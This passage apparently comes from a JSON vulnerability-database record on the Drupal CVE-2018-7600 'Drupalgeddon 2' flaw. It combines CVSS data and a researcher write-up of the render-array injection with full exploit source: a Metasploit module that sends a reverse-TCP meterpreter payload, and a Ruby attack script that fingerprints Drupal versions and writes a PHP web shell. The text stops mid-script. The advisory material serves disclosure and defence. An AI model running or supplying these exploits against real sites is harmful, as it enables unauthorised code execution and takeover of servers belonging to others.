"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T07:29:00", "id": "DEBIANCVE:CVE-2018-7600", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-08T07:10:20", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. 
In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. 
This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 
2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. 
The final results highlight how easy it is for an organization to be exposed through no fault of its own, but rather through the third-party platforms it uses every day.
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-13T00:00:00", "id": "A9E466E8-4144-11E8-A292-00E04C1EA73D", "href": "https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-12-10T23:13:22", "description": "This exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:50pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**busterb** at May 09, 2019 5:57pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**hrbrmstr** at May 12, 2020 7:54pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. 
My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "attackerkb", "title": "Drupalgeddon 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-09-02T00:00:00", "id": "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "href": "https://attackerkb.com/topics/0gCgI4g4Z2/drupalgeddon-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:14:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "type": "exploitdb", 
"title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-7600", "CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EDB-ID:44482", "href": "https://www.exploit-db.com/exploits/44482", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 
'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n\r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end", "sourceHref": "https://www.exploit-db.com/download/44482", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T08:14:45", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-7600", "CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EDB-ID:44449", "href": "https://www.exploit-db.com/exploits/44449", "sourceData": "#!/usr/bin/env ruby\r\n#\r\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\r\n#\r\n# Authors:\r\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\r\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\r\n#\r\n\r\n\r\nrequire 'base64'\r\nrequire 'json'\r\nrequire 'net/http'\r\nrequire 'openssl'\r\nrequire 'readline'\r\nrequire 'highline/import'\r\n\r\n\r\n# Settings - Try to write a PHP to the web root?\r\ntry_phpshell = true\r\n# Settings - General/Stealth\r\n$useragent = \"drupalgeddon2\"\r\nwebshell = \"shell.php\"\r\n# Settings - Proxy information (nil to disable)\r\n$proxy_addr = nil\r\n$proxy_port = 8080\r\n\r\n\r\n# Settings - Payload (we could just be happy 
without this PHP shell, by using just the OS shell - but this is 'better'!)\r\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\r\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Function http_request <url> [type] [data]\r\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\r\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\r\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\r\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\r\n\r\n begin\r\n uri = URI(url)\r\n request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\r\n request.initialize_http_header({\"User-Agent\" => $useragent})\r\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\r\n request.body = payload if not payload.empty?\r\n return $http.request(request)\r\n rescue SocketError\r\n puts error(\"Network connectivity issue\")\r\n rescue Errno::ECONNREFUSED => e\r\n puts error(\"The target is down ~ #{e.message}\")\r\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\r\n rescue Timeout::Error => e\r\n puts error(\"The target timed out ~ #{e.message}\")\r\n end\r\n\r\n # If we got here, something went wrong.\r\n exit\r\nend\r\n\r\n\r\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\r\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\r\n puts info(\"Payload: #{evil}\") if not shell\r\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? 
and $verbose\r\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\r\n\r\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\r\n # Check the version to match the payload\r\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\r\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\r\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\r\n\r\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\r\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\r\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\r\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + \"&timezone[a][#lazy_builder][][]=\" + evil\r\n\r\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\r\n\r\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\r\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\r\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\r\n payload = \"form_id=user_pass&_triggering_element_name=name\"\r\n end\r\n\r\n # Drupal v7.x needs an extra value from a form\r\n if $drupalverion.start_with?(\"7\")\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n\r\n form_name = \"form_build_id\"\r\n puts verbose(\"Form name : #{form_name}\") if $verbose\r\n\r\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\r\n puts 
warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\r\n puts verbose(\"Form value : #{form_value}\") if $verbose\r\n\r\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\r\n payload = \"#{form_name}=#{form_value}\"\r\n end\r\n\r\n return url, payload\r\nend\r\n\r\n\r\n# Function clean_result <input>\r\ndef clean_result(input)\r\n #result = JSON.pretty_generate(JSON[response.body])\r\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\r\n clean = input.to_s.strip\r\n\r\n # PHP function: passthru\r\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\r\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\r\n\r\n # PHP function: exec\r\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\r\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\r\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\r\n\r\n # Newer PHP for an older Drupal\r\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\r\n #clean.slice!(/<b>.*<br \\/>/)\r\n\r\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\r\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\r\n clean.slice!(/The website encountered an unexpected error.*/)\r\n\r\n return clean\r\nend\r\n\r\n\r\n# Feedback when something goes right\r\ndef success(text)\r\n # Green\r\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something goes wrong\r\ndef error(text)\r\n # 
Red\r\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something may have issues\r\ndef warning(text)\r\n # Yellow\r\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback when something doing something\r\ndef action(text)\r\n # Blue\r\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback with helpful information\r\ndef info(text)\r\n # Light blue\r\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\r\nend\r\n\r\n# Feedback for the overkill\r\ndef verbose(text)\r\n # Dark grey\r\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\r\nend\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\ndef init_authentication()\r\n $uname = ask('Enter your username: ') { |q| q.echo = false }\r\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\r\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\r\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\r\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\r\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\r\nend\r\n\r\ndef is_arg(args, param)\r\n args.each do |arg|\r\n if arg == param\r\n return true\r\n end\r\n end\r\n return false\r\nend\r\n\r\n\r\n# Quick how to use\r\ndef usage()\r\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\r\n puts 'Example for target that does not require authentication:'\r\n puts ' ruby drupalgeddon2.rb https://example.com'\r\n puts 'Example for target that does require authentication:'\r\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\r\nend\r\n\r\n\r\n# Read in values\r\nif ARGV.empty?\r\n usage()\r\n exit\r\nend\r\n\r\n$target = ARGV[0]\r\ninit_authentication() if is_arg(ARGV, '--authentication')\r\n$verbose = is_arg(ARGV, '--verbose')\r\n\r\n\r\n# 
Check input for protocol\r\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\r\n# Check input for the end\r\n$target += \"/\" if not $target.end_with?(\"/\")\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Banner\r\nputs action(\"--==[::#Drupalggedon2::]==--\")\r\nputs \"-\"*80\r\nputs info(\"Target : #{$target}\")\r\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\r\nputs info(\"Write? : Skipping writing PHP web shell\") if not try_phpshell\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Setup connection\r\nuri = URI($target)\r\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\r\n\r\n# Use SSL/TLS if needed\r\nif uri.scheme == \"https\"\r\n $http.use_ssl = true\r\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\nend\r\n\r\n$session_cookie = ''\r\n# If authentication required then login and get session cookie\r\nif $uname\r\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\r\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\r\n if (response.code == '200' or response.code == '303') and not response.body.empty? 
and response['set-cookie']\r\n $session_cookie = response['set-cookie'].split('; ')[0]\r\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\r\n end\r\n\r\nend\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Try and get version\r\n$drupalverion = \"\"\r\n\r\n# Possible URLs\r\nurl = [\r\n # --- changelog ---\r\n # Drupal v6.x / v7.x [200]\r\n $target + \"CHANGELOG.txt\",\r\n # Drupal v8.x [200]\r\n $target + \"core/CHANGELOG.txt\",\r\n\r\n # --- bootstrap ---\r\n # Drupal v7.x / v6.x [403]\r\n $target + \"includes/bootstrap.inc\",\r\n # Drupal v8.x [403]\r\n $target + \"core/includes/bootstrap.inc\",\r\n\r\n # --- database ---\r\n # Drupal v7.x / v6.x [403]\r\n $target + \"includes/database.inc\",\r\n # Drupal v7.x [403]\r\n #$target + \"includes/database/database.inc\",\r\n # Drupal v8.x [403]\r\n #$target + \"core/includes/database.inc\",\r\n\r\n # --- landing page ---\r\n # Drupal v8.x / v7.x [200]\r\n $target,\r\n]\r\n\r\n# Check all\r\nurl.each do|uri|\r\n # Check response\r\n response = http_request(uri, 'get', '', $session_cookie)\r\n\r\n # Check header\r\n if response['X-Generator'] and $drupalverion.empty?\r\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\r\n\r\n if not header.empty?\r\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\r\n puts success(\"Header : v#{header} [X-Generator]\")\r\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\r\n end\r\n end\r\n\r\n # Check request response, valid\r\n if response.code == \"200\"\r\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\r\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n\r\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\r\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? 
\"was not found on this server\"\r\n\r\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\r\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\r\n\r\n # Only works for CHANGELOG.txt\r\n if uri.match(/CHANGELOG.txt/)\r\n # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\r\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\r\n\r\n # Patched already? (For Drupal v8.4.x / v7.x)\r\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? \"SA-CORE-2018-002\"\r\n\r\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\r\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\r\n\r\n # Blank if not valid\r\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\r\n end\r\n\r\n # Check meta tag\r\n if not response.body.empty?\r\n # For Drupal v8.x / v7.x\r\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\r\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\r\n\r\n if not metatag.empty?\r\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\r\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\r\n puts verbose(meta.to_s) if $verbose\r\n end\r\n end\r\n\r\n # Done! ...if a full known version, else keep going... may get lucky later!\r\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\r\n end\r\n\r\n # Check request response, not allowed\r\n if response.code == \"403\" and $drupalverion.empty?\r\n tmp = $verbose ? 
